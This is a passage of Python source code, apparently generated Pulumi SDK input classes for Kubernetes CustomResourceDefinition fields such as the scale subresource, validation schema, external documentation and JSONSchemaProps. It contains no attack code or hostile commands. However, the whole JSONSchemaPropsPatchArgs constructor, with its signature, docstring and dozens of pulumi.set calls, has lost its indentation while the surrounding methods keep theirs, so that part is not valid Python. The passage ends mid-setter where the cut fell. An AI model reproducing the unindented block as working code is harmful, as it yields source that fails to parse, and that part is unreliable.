        :param pulumi.Input['CustomResourceDefinitionSpecArgs'] spec: spec describes how the user wants the resources to appear
        :param pulumi.Input[str] api_version: APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources
        :param pulumi.Input[str] kind: Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
        :param pulumi.Input['_meta.v1.ObjectMetaArgs'] metadata: Standard object's metadata More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata
        :param pulumi.Input['CustomResourceDefinitionStatusArgs'] status: status indicates the actual state of the CustomResourceDefinition
        """
        pulumi.set(__self__, "spec", spec)
        if api_version is not None:
            # NOTE(review): the user-supplied api_version is discarded and the
            # canonical constant is stored instead. This looks like standard
            # Pulumi codegen behavior for apiVersion/kind fields — confirm
            # against the code generator before changing.
            pulumi.set(__self__, "api_version", 'apiextensions.k8s.io/v1')
        if kind is not None:
            # NOTE(review): as above — the passed kind is replaced with the
            # canonical constant for this resource type.
            pulumi.set(__self__, "kind", 'CustomResourceDefinition')
        if metadata is not None:
            pulumi.set(__self__, "metadata", metadata)
        if status is not None:
            pulumi.set(__self__, "status", status)
    @property
    @pulumi.getter
    def spec(self) -> pulumi.Input['CustomResourceDefinitionSpecArgs']:
        """
        spec describes how the user wants the resources to appear
        """
        return pulumi.get(self, "spec")
    @spec.setter
    def spec(self, value: pulumi.Input['CustomResourceDefinitionSpecArgs']):
        pulumi.set(self, "spec", value)
    @property
    @pulumi.getter(name="apiVersion")
    def api_version(self) -> Optional[pulumi.Input[str]]:
        """
        APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources
        """
        return pulumi.get(self, "api_version")
    @api_version.setter
    def api_version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "api_version", value)
    @property
    @pulumi.getter
    def kind(self) -> Optional[pulumi.Input[str]]:
        """
        Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
        """
        return pulumi.get(self, "kind")
    @kind.setter
    def kind(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "kind", value)
    @property
    @pulumi.getter
    def metadata(self) -> Optional[pulumi.Input['_meta.v1.ObjectMetaArgs']]:
        """
        Standard object's metadata More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata
        """
        return pulumi.get(self, "metadata")
    @metadata.setter
    def metadata(self, value: Optional[pulumi.Input['_meta.v1.ObjectMetaArgs']]):
        pulumi.set(self, "metadata", value)
    @property
    @pulumi.getter
    def status(self) -> Optional[pulumi.Input['CustomResourceDefinitionStatusArgs']]:
        """
        status indicates the actual state of the CustomResourceDefinition
        """
        return pulumi.get(self, "status")
    @status.setter
    def status(self, value: Optional[pulumi.Input['CustomResourceDefinitionStatusArgs']]):
        pulumi.set(self, "status", value)
@pulumi.input_type
class CustomResourceSubresourceScalePatchArgs:
    """
    Patch-variant inputs for serving the ``/scale`` subresource of a custom
    resource: every field is optional and only explicitly supplied values are
    recorded (via ``pulumi.set``).
    """
    def __init__(__self__, *,
                 label_selector_path: Optional[pulumi.Input[str]] = None,
                 spec_replicas_path: Optional[pulumi.Input[str]] = None,
                 status_replicas_path: Optional[pulumi.Input[str]] = None):
        """
        CustomResourceSubresourceScale defines how to serve the scale subresource for CustomResources.
        :param pulumi.Input[str] label_selector_path: labelSelectorPath defines the JSON path inside of a custom resource that corresponds to Scale `status.selector`. Only JSON paths without the array notation are allowed. Must be a JSON Path under `.status` or `.spec`. Must be set to work with HorizontalPodAutoscaler. The field pointed by this JSON path must be a string field (not a complex selector struct) which contains a serialized label selector in string form. More info: https://kubernetes.io/docs/tasks/access-kubernetes-api/custom-resources/custom-resource-definitions#scale-subresource If there is no value under the given path in the custom resource, the `status.selector` value in the `/scale` subresource will default to the empty string.
        :param pulumi.Input[str] spec_replicas_path: specReplicasPath defines the JSON path inside of a custom resource that corresponds to Scale `spec.replicas`. Only JSON paths without the array notation are allowed. Must be a JSON Path under `.spec`. If there is no value under the given path in the custom resource, the `/scale` subresource will return an error on GET.
        :param pulumi.Input[str] status_replicas_path: statusReplicasPath defines the JSON path inside of a custom resource that corresponds to Scale `status.replicas`. Only JSON paths without the array notation are allowed. Must be a JSON Path under `.status`. If there is no value under the given path in the custom resource, the `status.replicas` value in the `/scale` subresource will default to 0.
        """
        # Record only the inputs the caller provided, in declaration order.
        supplied = (("label_selector_path", label_selector_path),
                    ("spec_replicas_path", spec_replicas_path),
                    ("status_replicas_path", status_replicas_path))
        for attr_name, attr_value in supplied:
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)
    @property
    @pulumi.getter(name="labelSelectorPath")
    def label_selector_path(self) -> Optional[pulumi.Input[str]]:
        """
        labelSelectorPath defines the JSON path inside of a custom resource that corresponds to Scale `status.selector`. Only JSON paths without the array notation are allowed. Must be a JSON Path under `.status` or `.spec`. Must be set to work with HorizontalPodAutoscaler. The field pointed by this JSON path must be a string field (not a complex selector struct) which contains a serialized label selector in string form. More info: https://kubernetes.io/docs/tasks/access-kubernetes-api/custom-resources/custom-resource-definitions#scale-subresource If there is no value under the given path in the custom resource, the `status.selector` value in the `/scale` subresource will default to the empty string.
        """
        return pulumi.get(self, "label_selector_path")
    @label_selector_path.setter
    def label_selector_path(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "label_selector_path", value)
    @property
    @pulumi.getter(name="specReplicasPath")
    def spec_replicas_path(self) -> Optional[pulumi.Input[str]]:
        """
        specReplicasPath defines the JSON path inside of a custom resource that corresponds to Scale `spec.replicas`. Only JSON paths without the array notation are allowed. Must be a JSON Path under `.spec`. If there is no value under the given path in the custom resource, the `/scale` subresource will return an error on GET.
        """
        return pulumi.get(self, "spec_replicas_path")
    @spec_replicas_path.setter
    def spec_replicas_path(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "spec_replicas_path", value)
    @property
    @pulumi.getter(name="statusReplicasPath")
    def status_replicas_path(self) -> Optional[pulumi.Input[str]]:
        """
        statusReplicasPath defines the JSON path inside of a custom resource that corresponds to Scale `status.replicas`. Only JSON paths without the array notation are allowed. Must be a JSON Path under `.status`. If there is no value under the given path in the custom resource, the `status.replicas` value in the `/scale` subresource will default to 0.
        """
        return pulumi.get(self, "status_replicas_path")
    @status_replicas_path.setter
    def status_replicas_path(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "status_replicas_path", value)
@pulumi.input_type
class CustomResourceSubresourceScaleArgs:
    def __init__(__self__, *,
                 spec_replicas_path: pulumi.Input[str],
                 status_replicas_path: pulumi.Input[str],
                 label_selector_path: Optional[pulumi.Input[str]] = None):
        """
        CustomResourceSubresourceScale defines how to serve the scale subresource for CustomResources.
        :param pulumi.Input[str] spec_replicas_path: specReplicasPath defines the JSON path inside of a custom resource that corresponds to Scale `spec.replicas`. Only JSON paths without the array notation are allowed. Must be a JSON Path under `.spec`. If there is no value under the given path in the custom resource, the `/scale` subresource will return an error on GET.
        :param pulumi.Input[str] status_replicas_path: statusReplicasPath defines the JSON path inside of a custom resource that corresponds to Scale `status.replicas`. Only JSON paths without the array notation are allowed. Must be a JSON Path under `.status`. If there is no value under the given path in the custom resource, the `status.replicas` value in the `/scale` subresource will default to 0.
        :param pulumi.Input[str] label_selector_path: labelSelectorPath defines the JSON path inside of a custom resource that corresponds to Scale `status.selector`. Only JSON paths without the array notation are allowed. Must be a JSON Path under `.status` or `.spec`. Must be set to work with HorizontalPodAutoscaler. The field pointed by this JSON path must be a string field (not a complex selector struct) which contains a serialized label selector in string form. More info: https://kubernetes.io/docs/tasks/access-kubernetes-api/custom-resources/custom-resource-definitions#scale-subresource If there is no value under the given path in the custom resource, the `status.selector` value in the `/scale` subresource will default to the empty string.
        """
        # Required fields are always stored; the optional one only when supplied.
        pulumi.set(__self__, "spec_replicas_path", spec_replicas_path)
        pulumi.set(__self__, "status_replicas_path", status_replicas_path)
        if label_selector_path is not None:
            pulumi.set(__self__, "label_selector_path", label_selector_path)
    # Accessor pair for the required `specReplicasPath` field; reads and
    # writes the value stored by __init__ via pulumi.get/pulumi.set.
    @property
    @pulumi.getter(name="specReplicasPath")
    def spec_replicas_path(self) -> pulumi.Input[str]:
        """
        specReplicasPath defines the JSON path inside of a custom resource that corresponds to Scale `spec.replicas`. Only JSON paths without the array notation are allowed. Must be a JSON Path under `.spec`. If there is no value under the given path in the custom resource, the `/scale` subresource will return an error on GET.
        """
        return pulumi.get(self, "spec_replicas_path")
    # Setter mirrors the getter: stores the new path under the same field key.
    @spec_replicas_path.setter
    def spec_replicas_path(self, value: pulumi.Input[str]):
        pulumi.set(self, "spec_replicas_path", value)
    # Accessor pair for the required `statusReplicasPath` field; reads and
    # writes the value stored by __init__ via pulumi.get/pulumi.set.
    @property
    @pulumi.getter(name="statusReplicasPath")
    def status_replicas_path(self) -> pulumi.Input[str]:
        """
        statusReplicasPath defines the JSON path inside of a custom resource that corresponds to Scale `status.replicas`. Only JSON paths without the array notation are allowed. Must be a JSON Path under `.status`. If there is no value under the given path in the custom resource, the `status.replicas` value in the `/scale` subresource will default to 0.
        """
        return pulumi.get(self, "status_replicas_path")
    # Setter mirrors the getter: stores the new path under the same field key.
    @status_replicas_path.setter
    def status_replicas_path(self, value: pulumi.Input[str]):
        pulumi.set(self, "status_replicas_path", value)
    # Accessor pair for the optional `labelSelectorPath` field; the getter
    # returns None when __init__ recorded no value.
    @property
    @pulumi.getter(name="labelSelectorPath")
    def label_selector_path(self) -> Optional[pulumi.Input[str]]:
        """
        labelSelectorPath defines the JSON path inside of a custom resource that corresponds to Scale `status.selector`. Only JSON paths without the array notation are allowed. Must be a JSON Path under `.status` or `.spec`. Must be set to work with HorizontalPodAutoscaler. The field pointed by this JSON path must be a string field (not a complex selector struct) which contains a serialized label selector in string form. More info: https://kubernetes.io/docs/tasks/access-kubernetes-api/custom-resources/custom-resource-definitions#scale-subresource If there is no value under the given path in the custom resource, the `status.selector` value in the `/scale` subresource will default to the empty string.
        """
        return pulumi.get(self, "label_selector_path")
    # Setter mirrors the getter: stores the new path under the same field key.
    @label_selector_path.setter
    def label_selector_path(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "label_selector_path", value)
@pulumi.input_type
class CustomResourceSubresourcesPatchArgs:
    def __init__(__self__, *,
                 scale: Optional[pulumi.Input['CustomResourceSubresourceScalePatchArgs']] = None,
                 status: Optional[Any] = None):
        """
        CustomResourceSubresources defines the status and scale subresources for CustomResources.

        :param pulumi.Input['CustomResourceSubresourceScalePatchArgs'] scale: when set, the custom resource serves a `/scale` subresource returning an `autoscaling/v1` Scale object.
        :param Any status: when set, the custom resource serves a `/status` subresource; requests to the primary endpoint then ignore changes to the `status` stanza, and requests to `/status` ignore changes to everything except the `status` stanza.
        """
        # Record only the fields the caller explicitly provided.
        for field_name, field_value in (("scale", scale), ("status", status)):
            if field_value is not None:
                pulumi.set(__self__, field_name, field_value)

    @property
    @pulumi.getter
    def scale(self) -> Optional[pulumi.Input['CustomResourceSubresourceScalePatchArgs']]:
        """
        scale indicates the custom resource should serve a `/scale` subresource that returns an `autoscaling/v1` Scale object.
        """
        return pulumi.get(self, "scale")

    @scale.setter
    def scale(self, value: Optional[pulumi.Input['CustomResourceSubresourceScalePatchArgs']]):
        pulumi.set(self, "scale", value)

    @property
    @pulumi.getter
    def status(self) -> Optional[Any]:
        """
        status indicates the custom resource should serve a `/status` subresource. When enabled: 1. requests to the custom resource primary endpoint ignore changes to the `status` stanza of the object. 2. requests to the custom resource `/status` subresource ignore changes to anything other than the `status` stanza of the object.
        """
        return pulumi.get(self, "status")

    @status.setter
    def status(self, value: Optional[Any]):
        pulumi.set(self, "status", value)
@pulumi.input_type
class CustomResourceSubresourcesArgs:
    def __init__(__self__, *,
                 scale: Optional[pulumi.Input['CustomResourceSubresourceScaleArgs']] = None,
                 status: Optional[Any] = None):
        """
        CustomResourceSubresources defines the status and scale subresources for CustomResources.

        :param pulumi.Input['CustomResourceSubresourceScaleArgs'] scale: when set, the custom resource serves a `/scale` subresource returning an `autoscaling/v1` Scale object.
        :param Any status: when set, the custom resource serves a `/status` subresource; requests to the primary endpoint then ignore changes to the `status` stanza, and requests to `/status` ignore changes to everything except the `status` stanza.
        """
        # Record only the fields the caller explicitly provided.
        for field_name, field_value in (("scale", scale), ("status", status)):
            if field_value is not None:
                pulumi.set(__self__, field_name, field_value)

    @property
    @pulumi.getter
    def scale(self) -> Optional[pulumi.Input['CustomResourceSubresourceScaleArgs']]:
        """
        scale indicates the custom resource should serve a `/scale` subresource that returns an `autoscaling/v1` Scale object.
        """
        return pulumi.get(self, "scale")

    @scale.setter
    def scale(self, value: Optional[pulumi.Input['CustomResourceSubresourceScaleArgs']]):
        pulumi.set(self, "scale", value)

    @property
    @pulumi.getter
    def status(self) -> Optional[Any]:
        """
        status indicates the custom resource should serve a `/status` subresource. When enabled: 1. requests to the custom resource primary endpoint ignore changes to the `status` stanza of the object. 2. requests to the custom resource `/status` subresource ignore changes to anything other than the `status` stanza of the object.
        """
        return pulumi.get(self, "status")

    @status.setter
    def status(self, value: Optional[Any]):
        pulumi.set(self, "status", value)
@pulumi.input_type
class CustomResourceValidationPatchArgs:
    def __init__(__self__, *,
                 open_apiv3_schema: Optional[pulumi.Input['JSONSchemaPropsPatchArgs']] = None):
        """
        CustomResourceValidation is a list of validation methods for CustomResources.

        :param pulumi.Input['JSONSchemaPropsPatchArgs'] open_apiv3_schema: the OpenAPI v3 schema used for validation and pruning.
        """
        # Nothing to record when no schema was supplied.
        if open_apiv3_schema is None:
            return
        pulumi.set(__self__, "open_apiv3_schema", open_apiv3_schema)

    @property
    @pulumi.getter(name="openAPIV3Schema")
    def open_apiv3_schema(self) -> Optional[pulumi.Input['JSONSchemaPropsPatchArgs']]:
        """
        openAPIV3Schema is the OpenAPI v3 schema to use for validation and pruning.
        """
        return pulumi.get(self, "open_apiv3_schema")

    @open_apiv3_schema.setter
    def open_apiv3_schema(self, value: Optional[pulumi.Input['JSONSchemaPropsPatchArgs']]):
        pulumi.set(self, "open_apiv3_schema", value)
@pulumi.input_type
class CustomResourceValidationArgs:
    def __init__(__self__, *,
                 open_apiv3_schema: Optional[pulumi.Input['JSONSchemaPropsArgs']] = None):
        """
        CustomResourceValidation is a list of validation methods for CustomResources.

        :param pulumi.Input['JSONSchemaPropsArgs'] open_apiv3_schema: the OpenAPI v3 schema used for validation and pruning.
        """
        # Nothing to record when no schema was supplied.
        if open_apiv3_schema is None:
            return
        pulumi.set(__self__, "open_apiv3_schema", open_apiv3_schema)

    @property
    @pulumi.getter(name="openAPIV3Schema")
    def open_apiv3_schema(self) -> Optional[pulumi.Input['JSONSchemaPropsArgs']]:
        """
        openAPIV3Schema is the OpenAPI v3 schema to use for validation and pruning.
        """
        return pulumi.get(self, "open_apiv3_schema")

    @open_apiv3_schema.setter
    def open_apiv3_schema(self, value: Optional[pulumi.Input['JSONSchemaPropsArgs']]):
        pulumi.set(self, "open_apiv3_schema", value)
@pulumi.input_type
class ExternalDocumentationPatchArgs:
    def __init__(__self__, *,
                 description: Optional[pulumi.Input[str]] = None,
                 url: Optional[pulumi.Input[str]] = None):
        """
        ExternalDocumentation allows referencing an external resource for extended documentation.

        Both fields are optional; only arguments that are not None are recorded.
        """
        for field_name, field_value in (("description", description), ("url", url)):
            if field_value is not None:
                pulumi.set(__self__, field_name, field_value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """Return the stored description, or None when unset."""
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter
    def url(self) -> Optional[pulumi.Input[str]]:
        """Return the stored url, or None when unset."""
        return pulumi.get(self, "url")

    @url.setter
    def url(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "url", value)
@pulumi.input_type
class ExternalDocumentationArgs:
    def __init__(__self__, *,
                 description: Optional[pulumi.Input[str]] = None,
                 url: Optional[pulumi.Input[str]] = None):
        """
        ExternalDocumentation allows referencing an external resource for extended documentation.

        Both fields are optional; only arguments that are not None are recorded.
        """
        for field_name, field_value in (("description", description), ("url", url)):
            if field_value is not None:
                pulumi.set(__self__, field_name, field_value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """Return the stored description, or None when unset."""
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter
    def url(self) -> Optional[pulumi.Input[str]]:
        """Return the stored url, or None when unset."""
        return pulumi.get(self, "url")

    @url.setter
    def url(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "url", value)
@pulumi.input_type
class JSONSchemaPropsPatchArgs:
def __init__(__self__, *,
_ref: Optional[pulumi.Input[str]] = None,
_schema: Optional[pulumi.Input[str]] = None,
additional_items: Optional[pulumi.Input[Union['JSONSchemaPropsArgs', bool]]] = None,
additional_properties: Optional[pulumi.Input[Union['JSONSchemaPropsArgs', bool]]] = None,
all_of: Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsPatchArgs']]]] = None,
any_of: Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsPatchArgs']]]] = None,
default: Optional[Any] = None,
definitions: Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]] = None,
dependencies: Optional[pulumi.Input[Mapping[str, pulumi.Input[Union['JSONSchemaPropsArgs', Sequence[pulumi.Input[str]]]]]]] = None,
description: Optional[pulumi.Input[str]] = None,
enum: Optional[pulumi.Input[Sequence[Any]]] = None,
example: Optional[Any] = None,
exclusive_maximum: Optional[pulumi.Input[bool]] = None,
exclusive_minimum: Optional[pulumi.Input[bool]] = None,
external_docs: Optional[pulumi.Input['ExternalDocumentationPatchArgs']] = None,
format: Optional[pulumi.Input[str]] = None,
id: Optional[pulumi.Input[str]] = None,
items: Optional[pulumi.Input[Union['JSONSchemaPropsArgs', Sequence[Any]]]] = None,
max_items: Optional[pulumi.Input[int]] = None,
max_length: Optional[pulumi.Input[int]] = None,
max_properties: Optional[pulumi.Input[int]] = None,
maximum: Optional[pulumi.Input[float]] = None,
min_items: Optional[pulumi.Input[int]] = None,
min_length: Optional[pulumi.Input[int]] = None,
min_properties: Optional[pulumi.Input[int]] = None,
minimum: Optional[pulumi.Input[float]] = None,
multiple_of: Optional[pulumi.Input[float]] = None,
not_: Optional[pulumi.Input['JSONSchemaPropsPatchArgs']] = None,
nullable: Optional[pulumi.Input[bool]] = None,
one_of: Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsPatchArgs']]]] = None,
pattern: Optional[pulumi.Input[str]] = None,
pattern_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]] = None,
properties: Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]] = None,
required: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
title: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
unique_items: Optional[pulumi.Input[bool]] = None,
x_kubernetes_embedded_resource: Optional[pulumi.Input[bool]] = None,
x_kubernetes_int_or_string: Optional[pulumi.Input[bool]] = None,
x_kubernetes_list_map_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
x_kubernetes_list_type: Optional[pulumi.Input[str]] = None,
x_kubernetes_map_type: Optional[pulumi.Input[str]] = None,
x_kubernetes_preserve_unknown_fields: Optional[pulumi.Input[bool]] = None,
x_kubernetes_validations: Optional[pulumi.Input[Sequence[pulumi.Input['ValidationRulePatchArgs']]]] = None):
"""
JSONSchemaProps is a JSON-Schema following Specification Draft 4 (http://json-schema.org/).
:param Any default: default is a default value for undefined object fields. Defaulting is a beta feature under the CustomResourceDefaulting feature gate. Defaulting requires spec.preserveUnknownFields to be false.
:param pulumi.Input[str] format: format is an OpenAPI v3 format string. Unknown formats are ignored. The following formats are validated:
- bsonobjectid: a bson object ID, i.e. a 24 characters hex string - uri: an URI as parsed by Golang net/url.ParseRequestURI - email: an email address as parsed by Golang net/mail.ParseAddress - hostname: a valid representation for an Internet host name, as defined by RFC 1034, section 3.1 [RFC1034]. - ipv4: an IPv4 IP as parsed by Golang net.ParseIP - ipv6: an IPv6 IP as parsed by Golang net.ParseIP - cidr: a CIDR as parsed by Golang net.ParseCIDR - mac: a MAC address as parsed by Golang net.ParseMAC - uuid: an UUID that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?[0-9a-f]{4}-?[0-9a-f]{4}-?[0-9a-f]{12}$ - uuid3: an UUID3 that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?3[0-9a-f]{3}-?[0-9a-f]{4}-?[0-9a-f]{12}$ - uuid4: an UUID4 that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?4[0-9a-f]{3}-?[89ab][0-9a-f]{3}-?[0-9a-f]{12}$ - uuid5: an UUID5 that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?5[0-9a-f]{3}-?[89ab][0-9a-f]{3}-?[0-9a-f]{12}$ - isbn: an ISBN10 or ISBN13 number string like "0321751043" or "978-0321751041" - isbn10: an ISBN10 number string like "0321751043" - isbn13: an ISBN13 number string like "978-0321751041" - creditcard: a credit card number defined by the regex ^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\\d{3})\\d{11})$ with any non digit characters mixed in - ssn: a U.S. 
social security number following the regex ^\\d{3}[- ]?\\d{2}[- ]?\\d{4}$ - hexcolor: an hexadecimal color code like "#FFFFFF: following the regex ^#?([0-9a-fA-F]{3}|[0-9a-fA-F]{6})$ - rgbcolor: an RGB color code like rgb like "rgb(255,255,2559" - byte: base64 encoded binary data - password: any kind of string - date: a date string like "2006-01-02" as defined by full-date in RFC3339 - duration: a duration string like "22 ns" as parsed by Golang time.ParseDuration or compatible with Scala duration format - datetime: a date time string like "2014-12-15T19:30:20.000Z" as defined by date-time in RFC3339.
:param pulumi.Input[bool] x_kubernetes_embedded_resource: x-kubernetes-embedded-resource defines that the value is an embedded Kubernetes runtime.Object, with TypeMeta and ObjectMeta. The type must be object. It is allowed to further restrict the embedded object. kind, apiVersion and metadata are validated automatically. x-kubernetes-preserve-unknown-fields is allowed to be true, but does not have to be if the object is fully specified (up to kind, apiVersion, metadata).
:param pulumi.Input[bool] x_kubernetes_int_or_string: x-kubernetes-int-or-string specifies that this value is either an integer or a string. If this is true, an empty type is allowed and type as child of anyOf is permitted if following one of the following patterns:
1) anyOf:
- type: integer
- type: string
2) allOf:
- anyOf:
- type: integer
- type: string
- ... zero or more
:param pulumi.Input[Sequence[pulumi.Input[str]]] x_kubernetes_list_map_keys: x-kubernetes-list-map-keys annotates an array with the x-kubernetes-list-type `map` by specifying the keys used as the index of the map.
This tag MUST only be used on lists that have the "x-kubernetes-list-type" extension set to "map". Also, the values specified for this attribute must be a scalar typed field of the child structure (no nesting is supported).
The properties specified must either be required or have a default value, to ensure those properties are present for all list items.
:param pulumi.Input[str] x_kubernetes_list_type: x-kubernetes-list-type annotates an array to further describe its topology. This extension must only be used on lists and may have 3 possible values:
1) `atomic`: the list is treated as a single entity, like a scalar.
Atomic lists will be entirely replaced when updated. This extension
may be used on any type of list (struct, scalar, ...).
2) `set`:
Sets are lists that must not have multiple items with the same value. Each
value must be a scalar, an object with x-kubernetes-map-type `atomic` or an
array with x-kubernetes-list-type `atomic`.
3) `map`:
These lists are like maps in that their elements have a non-index key
used to identify them. Order is preserved upon merge. The map tag
must only be used on a list with elements of type object.
Defaults to atomic for arrays.
:param pulumi.Input[str] x_kubernetes_map_type: x-kubernetes-map-type annotates an object to further describe its topology. This extension must only be used when type is object and may have 2 possible values:
1) `granular`:
These maps are actual maps (key-value pairs) and each fields are independent
from each other (they can each be manipulated by separate actors). This is
the default behaviour for all maps.
2) `atomic`: the list is treated as a single entity, like a scalar.
Atomic maps will be entirely replaced when updated.
:param pulumi.Input[bool] x_kubernetes_preserve_unknown_fields: x-kubernetes-preserve-unknown-fields stops the API server decoding step from pruning fields which are not specified in the validation schema. This affects fields recursively, but switches back to normal pruning behaviour if nested properties or additionalProperties are specified in the schema. This can either be true or undefined. False is forbidden.
:param pulumi.Input[Sequence[pulumi.Input['ValidationRulePatchArgs']]] x_kubernetes_validations: x-kubernetes-validations describes a list of validation rules written in the CEL expression language. This field is an alpha-level. Using this field requires the feature gate `CustomResourceValidationExpressions` to be enabled.
"""
if _ref is not None:
pulumi.set(__self__, "_ref", _ref)
if _schema is not None:
pulumi.set(__self__, "_schema", _schema)
if additional_items is not None:
pulumi.set(__self__, "additional_items", additional_items)
if additional_properties is not None:
pulumi.set(__self__, "additional_properties", additional_properties)
if all_of is not None:
pulumi.set(__self__, "all_of", all_of)
if any_of is not None:
pulumi.set(__self__, "any_of", any_of)
if default is not None:
pulumi.set(__self__, "default", default)
if definitions is not None:
pulumi.set(__self__, "definitions", definitions)
if dependencies is not None:
pulumi.set(__self__, "dependencies", dependencies)
if description is not None:
pulumi.set(__self__, "description", description)
if enum is not None:
pulumi.set(__self__, "enum", enum)
if example is not None:
pulumi.set(__self__, "example", example)
if exclusive_maximum is not None:
pulumi.set(__self__, "exclusive_maximum", exclusive_maximum)
if exclusive_minimum is not None:
pulumi.set(__self__, "exclusive_minimum", exclusive_minimum)
if external_docs is not None:
pulumi.set(__self__, "external_docs", external_docs)
if format is not None:
pulumi.set(__self__, "format", format)
if id is not None:
pulumi.set(__self__, "id", id)
if items is not None:
pulumi.set(__self__, "items", items)
if max_items is not None:
pulumi.set(__self__, "max_items", max_items)
if max_length is not None:
pulumi.set(__self__, "max_length", max_length)
if max_properties is not None:
pulumi.set(__self__, "max_properties", max_properties)
if maximum is not None:
pulumi.set(__self__, "maximum", maximum)
if min_items is not None:
pulumi.set(__self__, "min_items", min_items)
if min_length is not None:
pulumi.set(__self__, "min_length", min_length)
if min_properties is not None:
pulumi.set(__self__, "min_properties", min_properties)
if minimum is not None:
pulumi.set(__self__, "minimum", minimum)
if multiple_of is not None:
pulumi.set(__self__, "multiple_of", multiple_of)
if not_ is not None:
pulumi.set(__self__, "not_", not_)
if nullable is not None:
pulumi.set(__self__, "nullable", nullable)
if one_of is not None:
pulumi.set(__self__, "one_of", one_of)
if pattern is not None:
pulumi.set(__self__, "pattern", pattern)
if pattern_properties is not None:
pulumi.set(__self__, "pattern_properties", pattern_properties)
if properties is not None:
pulumi.set(__self__, "properties", properties)
if required is not None:
pulumi.set(__self__, "required", required)
if title is not None:
pulumi.set(__self__, "title", title)
if type is not None:
pulumi.set(__self__, "type", type)
if unique_items is not None:
pulumi.set(__self__, "unique_items", unique_items)
if x_kubernetes_embedded_resource is not None:
pulumi.set(__self__, "x_kubernetes_embedded_resource", x_kubernetes_embedded_resource)
if x_kubernetes_int_or_string is not None:
pulumi.set(__self__, "x_kubernetes_int_or_string", x_kubernetes_int_or_string)
if x_kubernetes_list_map_keys is not None:
pulumi.set(__self__, "x_kubernetes_list_map_keys", x_kubernetes_list_map_keys)
if x_kubernetes_list_type is not None:
pulumi.set(__self__, "x_kubernetes_list_type", x_kubernetes_list_type)
if x_kubernetes_map_type is not None:
pulumi.set(__self__, "x_kubernetes_map_type", x_kubernetes_map_type)
if x_kubernetes_preserve_unknown_fields is not None:
pulumi.set(__self__, "x_kubernetes_preserve_unknown_fields", x_kubernetes_preserve_unknown_fields)
if x_kubernetes_validations is not None:
pulumi.set(__self__, "x_kubernetes_validations", x_kubernetes_validations)
    # ------------------------------------------------------------------
    # Generated accessors: each property below proxies pulumi.get/pulumi.set
    # for the field of the same name. Where the wire name differs from the
    # Python attribute name, @pulumi.getter(name=...) supplies the mapping
    # (e.g. "max_items" <-> "maxItems").
    # ------------------------------------------------------------------
    # Serialized as "$ref"; the leading underscore keeps the Python name valid.
    @property
    @pulumi.getter(name="$ref")
    def _ref(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "_ref")
    @_ref.setter
    def _ref(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "_ref", value)
    # Serialized as "$schema"; the leading underscore keeps the Python name valid.
    @property
    @pulumi.getter(name="$schema")
    def _schema(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "_schema")
    @_schema.setter
    def _schema(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "_schema", value)
    @property
    @pulumi.getter(name="additionalItems")
    def additional_items(self) -> Optional[pulumi.Input[Union['JSONSchemaPropsArgs', bool]]]:
        return pulumi.get(self, "additional_items")
    @additional_items.setter
    def additional_items(self, value: Optional[pulumi.Input[Union['JSONSchemaPropsArgs', bool]]]):
        pulumi.set(self, "additional_items", value)
    @property
    @pulumi.getter(name="additionalProperties")
    def additional_properties(self) -> Optional[pulumi.Input[Union['JSONSchemaPropsArgs', bool]]]:
        return pulumi.get(self, "additional_properties")
    @additional_properties.setter
    def additional_properties(self, value: Optional[pulumi.Input[Union['JSONSchemaPropsArgs', bool]]]):
